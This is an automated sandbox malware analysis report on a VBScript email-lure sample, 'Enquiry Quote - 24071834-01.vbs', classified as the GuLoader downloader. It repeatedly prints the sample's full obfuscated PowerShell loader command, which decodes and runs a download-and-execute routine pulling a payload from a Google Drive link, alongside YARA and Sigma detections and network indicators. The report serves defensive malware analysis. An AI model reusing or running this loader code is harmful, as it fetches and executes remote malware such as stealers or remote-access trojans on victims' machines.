Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Enquiry Quote - 24071834-01.vbs

Overview

General Information

Sample name:Enquiry Quote - 24071834-01.vbs
Analysis ID:1466658
MD5:9e2fe2b97264a9c35794d67e1c17ee26
SHA1:3d32f6f565e50eeeba893e7734a860b7bc45a1d4
SHA256:d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
Tags:vbs
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T ';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2020 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3024 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T ';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3824 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 8084JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_8084.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_3024.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xdd8c:$b2: ::FromBase64String(
              • 0xce00:$s1: -join
              • 0x65ac:$s4: +=
              • 0x666e:$s4: +=
              • 0xa895:$s4: +=
              • 0xc9b2:$s4: +=
              • 0xcc9c:$s4: +=
              • 0xcde2:$s4: +=
              • 0x15e7b:$s4: +=
              • 0x15efb:$s4: +=
              • 0x15fc1:$s4: +=
              • 0x16041:$s4: +=
              • 0x16217:$s4: +=
              • 0x1629b:$s4: +=
              • 0xd632:$e4: Get-WmiObject
              • 0xd821:$e4: Get-Process
              • 0xd879:$e4: Start-Process
              • 0x16b0f:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine|base64offset|contains: B-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", ProcessId: 5604, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine|base64offset|contains: B-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", ProcessId: 5604, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: Enquiry Quote - 24071834-01.vbsVirustotal: Detection: 9%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbRZ source: powershell.exe, 00000013.00000002.2559116933.000000000771C000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 0000000F.00000002.2642359454.000001FAE72D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 0000000F.00000002.2637600894.000001FAE7063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: wscript.exe, 00000000.00000003.1272521798.000001BBF8142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1264409533.000001BBF9F71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5f1628647b
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
